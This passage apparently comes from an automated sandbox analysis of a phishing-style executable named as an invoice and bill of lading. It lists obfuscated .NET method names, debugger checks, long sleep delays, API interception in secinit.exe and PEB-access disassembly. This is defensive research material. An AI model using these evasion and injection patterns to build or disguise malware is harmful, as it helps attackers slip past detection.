                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, e9Mmg0Rv3K7xsmI8Ef.csHigh entropy of concatenated method names: 'Dispose', 'IbIW52D9o2', 'm9gDUCA7c0', 'qrcw5iopLD', 'zdAWqrIFQA', 'aLlWzHxCiM', 'ProcessDialogKey', 'yvCDPgXPdw', 'qZ9DW7ZXpI', 'feGDDCbc9j'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Pd2ViPVyZ3J54hx0jb.csHigh entropy of concatenated method names: 'Pr8H2Up5ru', 'IQ0HGmTBEq', 'T5yHVh8Q8n', 'QGPHjehVMV', 'iKYHUJFRri', 'jwQH12Kpv1', 'XQAHrmbBbk', 'K3IHCq2KYN', 'MpfHigkbcT', 'YRPH3h1xBB'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, qClTUcspryY0Ri1c5R.csHigh entropy of concatenated method names: 'yP2dt0EeDT', 'OTJdR2KHhS', 'PxLdh9s5fM', 'jp5dkFZOIF', 'naLdlA3V1u', 'YZ7hF7tfxf', 'jmihQTyFtJ', 'abuhLQAZRC', 'YcwhORSKy5', 'xk4h5xTNOu'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, rwmJGXzFsbk0hl9Alh.csHigh entropy of concatenated method names: 'aswZyHMeTe', 'ctQZI6Joej', 'Pi7ZanZFbs', 'FEcZssRcEZ', 'v9SZU0HNB1', 'FbcZrtG1Vs', 'xM6ZCtRV5b', 'eplZA8SsQu', 'BUDZTL12yi', 'CVuZoacApf'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, TxhjfXXN2aKpUAvPay.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'zSjD5TmgHP', 'DA2DqbKGAh', 'fXoDzvFaMI', 'ira6PSVsqZ', 'UZs6WMnbHk', 'KsC6DXxn5g', 'fqc66qJPxn', 'SZPK1mRVHsOZSChoLTX'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, SHwLbNLjmrbI2D9o2f.csHigh entropy of concatenated method names: 'yW3vHElI2T', 'lWHvwUpx7D', 'z2mvvKoOWZ', 'NDavgt7BGp', 'mEfv4Y4eG8', 'zKnvADCygH', 'Dispose', 's6qN80cWrQ', 'wB4NRxvTNk', 'LtUNXtSPeA'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, B7MvwYmotUeZI0KC6v.csHigh entropy of concatenated method names: 'QBMwcfDplp', 'as7w7W7sAR', 'ToString', 'NIGw8wHam4', 'LcxwRrXYsn', 'vWjwX2A4qb', 'hkOwhpC0KO', 'uxcwdHdj4k', 'Eocwkh3x0h', 'HFmwllJU6U'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, SndfNPWWcIjGQ5cov4N.csHigh entropy of concatenated method names: 'suEZqN9WfG', 'rMDZzucpoY', 'IyngPXMpkd', 'Lt6gWDCjFu', 'JnogDQwoSx', 'qdHg6TwxkK', 'gb8gBGNQup', 'yrvgtcfAri', 'SGeg8TreWF', 'RmcgRjAdnx'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, nKNMlv3TvFbq76vphQ.csHigh entropy of concatenated method names: 'Ksck8GJ65Z', 'gyskXFEExd', 'fHwkdbTicL', 'tUWdqrnB3A', 'LCydz6aeQC', 'plYkPiMfHD', 'e8vkWsyh9H', 'ITdkDs47Gr', 'HINk6dEoKZ', 'YRKkB0OLH2'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, aCx5lcaTP33rxRCNCR.csHigh entropy of concatenated method names: 'OB2Xb18NJK', 'QhIXyup3Sn', 'tFRXIPy3jH', 'HtmXaYPJq9', 'dL4XH8YUmK', 'FAjXKkn04c', 'DUWXwlcoxj', 'muEXNlFRj9', 'sAUXv9XrJe', 'JnjXZSU2kP'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Jbc9jGqqCXZJTkKi4x.csHigh entropy of concatenated method names: 'obRZXq5tK3', 'IjQZhVRR4t', 'g7xZdWjns2', 'TcSZkXS3Sr', 'lTCZvMRqC0', 'ndMZlxkES9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, mh9HEsBx1KT4UfExJq.csHigh entropy of concatenated method names: 'MMqWkudlFe', 'kxJWlFsmZR', 'mTPWc33rxR', 'JNCW7Ry6bi', 'WV1WHMCwCl', 'xUcWKpryY0', 'XOrxN54ynAib0qyAGA', 'ToVLRouRoV7MECmtNC', 'pm6WWQF6yM', 'tPeW6Ky2oZ'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, h1kPvLQgbMKecy8pru.csHigh entropy of concatenated method names: 'AJ1wOIe50f', 'itSwqbd7dU', 'U2PNPiVMdD', 'yTlNWHiF9I', 'f0Pw945GVs', 'dnPwGpeSB9', 'uWmwMBoSI5', 'wyVwVobRSs', 'wskwjbkp7y', 'l5cwnbBGeg'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, JgXPdw5wZ97ZXpI8eG.csHigh entropy of concatenated method names: 'YFxvsBZnLf', 'UM2vUb1ujG', 'guWv130pwd', 'vFrvrsS21A', 'QfQvCdBbhC', 'Fnhvi0nxIV', 'Fxbv3fBgUm', 'mwpvExEaOq', 'eV9vYTRbU8', 'KdOv2HaOu6'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, HRRyNLWP3aCReQ34uIv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mQCZ9TRMtM', 'NtnZGrTLNk', 'diQZMWDybW', 'eayZVRvoy9', 'JSGZj6ll1u', 'WUnZnY0KY5', 'QcZZm7IwWc'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, YudlFeIlxJFsmZRCjZ.csHigh entropy of concatenated method names: 'sSRRV5JD0J', 'GDTRj4TWu7', 'TriRntCfGT', 'H5WRm3GqQL', 'SL9RFuUAK4', 'lMORQXvrt4', 'AfKRLay188', 'll9ROSSyjx', 'kmmR53lNfx', 'iedRq0TnZj'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, zUdOj2YCX8SVbVqi5j.csHigh entropy of concatenated method names: 'ro6kTTBg4h', 'C1KkoRtHCt', 'Td9kftfJxN', 'NUYkbXtVSy', 'OjJkpopJx8', 'sdkkyubeJa', 'qyBk0J7DNC', 'VlWkIiqlPL', 'w38kaiFMFR', 'FIqkSi2NSA'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, gX0RypnLwsmDbqthTf.csHigh entropy of concatenated method names: 'ToString', 'DrSK9NAo3q', 'ufvKUQm8Pm', 'ExTK14ADWW', 'JviKrpjcYv', 'PHLKC3HVV8', 'UB0Kif8WXu', 'fVtK3Jxfgq', 'rIoKEcUGGh', 'RXbKYig7AH'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, C6biJfSm4Srs3LV1MC.csHigh entropy of concatenated method names: 'esthpy5d4G', 'OkZh0GTHKt', 'GSEX10Cq9p', 'KVXXrI9p2Q', 'BS6XCC6TEY', 'g8kXiRnUYy', 'XnRX3Za7mO', 'g5bXE4yyLT', 'DDsXYDAWoD', 'pMkX2C72ov'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, aXR38bWBo0XaIiEmX5D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Om2xvGX5Up', 'Ol6xZVdvrS', 'nlmxgMW2YE', 'Vkpxxb7feD', 'IkFx4apv2Z', 'HYjxuJoh8L', 'Vi3xA4Lmjl'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, JF6ugEDBOHDgiaJMAa.csHigh entropy of concatenated method names: 'Iwef4FhDu', 'qwhbvTvIv', 'sqxylHgKU', 'QLu0V5lA7', 'Fa2aFCBoq', 'cAhSFddOc', 'e91DE6EfnT4EWybjMB', 'sri9f75abKEcGNrMRf', 'dZ0NsxXDv', 'U5aZXKOI4'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, VAmO9CMD1lR5QC0SBA.csHigh entropy of concatenated method names: 'QRAeITsrJ7', 'iqmeaoKOMR', 'IL0esM45B1', 'xGieUG3oPI', 'FnQerAgbU4', 'wBteCeY9oO', 'GOMe3aCFBk', 'cG6eEISJgA', 'bK0e2QkLU2', 'e2we9fbgnU'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Y89yuXlRbWJQaoDrKK.csHigh entropy of concatenated method names: 'RuL6tIwLeC', 'RWk68N7EYP', 'LYq6R53mip', 'oHm6XECYMf', 'HS76hPrBjY', 'qNy6dqBpHj', 'vbo6kj73Kn', 'IRT6lWRtcK', 'uO16Ju1ZtE', 'JwJ6cFT3Co'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, e9Mmg0Rv3K7xsmI8Ef.csHigh entropy of concatenated method names: 'Dispose', 'IbIW52D9o2', 'm9gDUCA7c0', 'qrcw5iopLD', 'zdAWqrIFQA', 'aLlWzHxCiM', 'ProcessDialogKey', 'yvCDPgXPdw', 'qZ9DW7ZXpI', 'feGDDCbc9j'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Pd2ViPVyZ3J54hx0jb.csHigh entropy of concatenated method names: 'Pr8H2Up5ru', 'IQ0HGmTBEq', 'T5yHVh8Q8n', 'QGPHjehVMV', 'iKYHUJFRri', 'jwQH12Kpv1', 'XQAHrmbBbk', 'K3IHCq2KYN', 'MpfHigkbcT', 'YRPH3h1xBB'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, qClTUcspryY0Ri1c5R.csHigh entropy of concatenated method names: 'yP2dt0EeDT', 'OTJdR2KHhS', 'PxLdh9s5fM', 'jp5dkFZOIF', 'naLdlA3V1u', 'YZ7hF7tfxf', 'jmihQTyFtJ', 'abuhLQAZRC', 'YcwhORSKy5', 'xk4h5xTNOu'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, rwmJGXzFsbk0hl9Alh.csHigh entropy of concatenated method names: 'aswZyHMeTe', 'ctQZI6Joej', 'Pi7ZanZFbs', 'FEcZssRcEZ', 'v9SZU0HNB1', 'FbcZrtG1Vs', 'xM6ZCtRV5b', 'eplZA8SsQu', 'BUDZTL12yi', 'CVuZoacApf'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, TxhjfXXN2aKpUAvPay.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'zSjD5TmgHP', 'DA2DqbKGAh', 'fXoDzvFaMI', 'ira6PSVsqZ', 'UZs6WMnbHk', 'KsC6DXxn5g', 'fqc66qJPxn', 'SZPK1mRVHsOZSChoLTX'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, SHwLbNLjmrbI2D9o2f.csHigh entropy of concatenated method names: 'yW3vHElI2T', 'lWHvwUpx7D', 'z2mvvKoOWZ', 'NDavgt7BGp', 'mEfv4Y4eG8', 'zKnvADCygH', 'Dispose', 's6qN80cWrQ', 'wB4NRxvTNk', 'LtUNXtSPeA'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, B7MvwYmotUeZI0KC6v.csHigh entropy of concatenated method names: 'QBMwcfDplp', 'as7w7W7sAR', 'ToString', 'NIGw8wHam4', 'LcxwRrXYsn', 'vWjwX2A4qb', 'hkOwhpC0KO', 'uxcwdHdj4k', 'Eocwkh3x0h', 'HFmwllJU6U'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, SndfNPWWcIjGQ5cov4N.csHigh entropy of concatenated method names: 'suEZqN9WfG', 'rMDZzucpoY', 'IyngPXMpkd', 'Lt6gWDCjFu', 'JnogDQwoSx', 'qdHg6TwxkK', 'gb8gBGNQup', 'yrvgtcfAri', 'SGeg8TreWF', 'RmcgRjAdnx'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, nKNMlv3TvFbq76vphQ.csHigh entropy of concatenated method names: 'Ksck8GJ65Z', 'gyskXFEExd', 'fHwkdbTicL', 'tUWdqrnB3A', 'LCydz6aeQC', 'plYkPiMfHD', 'e8vkWsyh9H', 'ITdkDs47Gr', 'HINk6dEoKZ', 'YRKkB0OLH2'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, aCx5lcaTP33rxRCNCR.csHigh entropy of concatenated method names: 'OB2Xb18NJK', 'QhIXyup3Sn', 'tFRXIPy3jH', 'HtmXaYPJq9', 'dL4XH8YUmK', 'FAjXKkn04c', 'DUWXwlcoxj', 'muEXNlFRj9', 'sAUXv9XrJe', 'JnjXZSU2kP'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Jbc9jGqqCXZJTkKi4x.csHigh entropy of concatenated method names: 'obRZXq5tK3', 'IjQZhVRR4t', 'g7xZdWjns2', 'TcSZkXS3Sr', 'lTCZvMRqC0', 'ndMZlxkES9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, mh9HEsBx1KT4UfExJq.csHigh entropy of concatenated method names: 'MMqWkudlFe', 'kxJWlFsmZR', 'mTPWc33rxR', 'JNCW7Ry6bi', 'WV1WHMCwCl', 'xUcWKpryY0', 'XOrxN54ynAib0qyAGA', 'ToVLRouRoV7MECmtNC', 'pm6WWQF6yM', 'tPeW6Ky2oZ'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, h1kPvLQgbMKecy8pru.csHigh entropy of concatenated method names: 'AJ1wOIe50f', 'itSwqbd7dU', 'U2PNPiVMdD', 'yTlNWHiF9I', 'f0Pw945GVs', 'dnPwGpeSB9', 'uWmwMBoSI5', 'wyVwVobRSs', 'wskwjbkp7y', 'l5cwnbBGeg'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, JgXPdw5wZ97ZXpI8eG.csHigh entropy of concatenated method names: 'YFxvsBZnLf', 'UM2vUb1ujG', 'guWv130pwd', 'vFrvrsS21A', 'QfQvCdBbhC', 'Fnhvi0nxIV', 'Fxbv3fBgUm', 'mwpvExEaOq', 'eV9vYTRbU8', 'KdOv2HaOu6'
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\secinit.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match; File source: Process Memory Space: INVOICE, PACKING LIST, COPY BL.exe PID: 7544, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\secinit.exe; API/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\secinit.exe; API/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\secinit.exe; API/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\secinit.exe; API/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\secinit.exe; API/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\secinit.exe; API/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\secinit.exe; API/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\secinit.exe; API/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Memory allocated: 10B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Memory allocated: 2BA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Memory allocated: 28B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Memory allocated: 8E60000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Memory allocated: 9E60000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Memory allocated: A070000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Memory allocated: B070000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Memory allocated: B480000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Memory allocated: C480000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Code function: 3_2_0167096E rdtsc
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\secinit.exe; Window / User API: threadDelayed 1633
                Source: C:\Windows\SysWOW64\secinit.exe; Window / User API: threadDelayed 8340
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\secinit.exe; API coverage: 2.7 %
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe TID: 7580; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8024; Thread sleep count: 1633 > 30
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8024; Thread sleep time: -3266000s >= -30000s
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8024; Thread sleep count: 8340 > 30
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8024; Thread sleep time: -16680000s >= -30000s
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe TID: 8036; Thread sleep time: -35000s >= -30000s
                Source: C:\Windows\SysWOW64\secinit.exe; Last function: Thread delayed
                Source: C:\Windows\SysWOW64\secinit.exe; Code function: 6_2_02ADC750 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Process queried: DebugPort
                Source: C:\Windows\SysWOW64\secinit.exe; Process queried: DebugPort
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Code function: 3_2_00417CF3 LdrLoadDll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A3C0 mov eax, dword ptr fs:[00000030h]3_2_0163A3C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A3C0 mov eax, dword ptr fs:[00000030h]3_2_0163A3C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A3C0 mov eax, dword ptr fs:[00000030h]3_2_0163A3C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016383C0 mov eax, dword ptr fs:[00000030h]3_2_016383C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016383C0 mov eax, dword ptr fs:[00000030h]3_2_016383C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016383C0 mov eax, dword ptr fs:[00000030h]3_2_016383C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016383C0 mov eax, dword ptr fs:[00000030h]3_2_016383C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B63C0 mov eax, dword ptr fs:[00000030h]3_2_016B63C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE3DB mov eax, dword ptr fs:[00000030h]3_2_016DE3DB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE3DB mov eax, dword ptr fs:[00000030h]3_2_016DE3DB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE3DB mov ecx, dword ptr fs:[00000030h]3_2_016DE3DB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE3DB mov eax, dword ptr fs:[00000030h]3_2_016DE3DB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D43D4 mov eax, dword ptr fs:[00000030h]3_2_016D43D4
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D43D4 mov eax, dword ptr fs:[00000030h]3_2_016D43D4
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E388 mov eax, dword ptr fs:[00000030h]3_2_0162E388
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E388 mov eax, dword ptr fs:[00000030h]3_2_0162E388
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E388 mov eax, dword ptr fs:[00000030h]3_2_0162E388
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165438F mov eax, dword ptr fs:[00000030h]3_2_0165438F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165438F mov eax, dword ptr fs:[00000030h]3_2_0165438F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01628397 mov eax, dword ptr fs:[00000030h]3_2_01628397
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01628397 mov eax, dword ptr fs:[00000030h]3_2_01628397
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01628397 mov eax, dword ptr fs:[00000030h]3_2_01628397
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01634260 mov eax, dword ptr fs:[00000030h]3_2_01634260
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01634260 mov eax, dword ptr fs:[00000030h]3_2_01634260
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01634260 mov eax, dword ptr fs:[00000030h]3_2_01634260
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162826B mov eax, dword ptr fs:[00000030h]3_2_0162826B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E0274 mov eax, dword ptr fs:[00000030h]3_2_016E0274
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B8243 mov eax, dword ptr fs:[00000030h]3_2_016B8243
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B8243 mov ecx, dword ptr fs:[00000030h]3_2_016B8243
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0170625D mov eax, dword ptr fs:[00000030h]3_2_0170625D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162A250 mov eax, dword ptr fs:[00000030h]3_2_0162A250
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01636259 mov eax, dword ptr fs:[00000030h]3_2_01636259
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EA250 mov eax, dword ptr fs:[00000030h]3_2_016EA250
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EA250 mov eax, dword ptr fs:[00000030h]3_2_016EA250
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162823B mov eax, dword ptr fs:[00000030h]3_2_0162823B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016402E1 mov eax, dword ptr fs:[00000030h]3_2_016402E1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016402E1 mov eax, dword ptr fs:[00000030h]3_2_016402E1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016402E1 mov eax, dword ptr fs:[00000030h]3_2_016402E1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A2C3 mov eax, dword ptr fs:[00000030h]3_2_0163A2C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A2C3 mov eax, dword ptr fs:[00000030h]3_2_0163A2C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A2C3 mov eax, dword ptr fs:[00000030h]3_2_0163A2C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A2C3 mov eax, dword ptr fs:[00000030h]3_2_0163A2C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A2C3 mov eax, dword ptr fs:[00000030h]3_2_0163A2C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017062D6 mov eax, dword ptr fs:[00000030h]3_2_017062D6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016402A0 mov eax, dword ptr fs:[00000030h]3_2_016402A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016402A0 mov eax, dword ptr fs:[00000030h]3_2_016402A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov eax, dword ptr fs:[00000030h]3_2_016C62A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov ecx, dword ptr fs:[00000030h]3_2_016C62A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov eax, dword ptr fs:[00000030h]3_2_016C62A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov eax, dword ptr fs:[00000030h]3_2_016C62A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov eax, dword ptr fs:[00000030h]3_2_016C62A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C62A0 mov eax, dword ptr fs:[00000030h]3_2_016C62A0
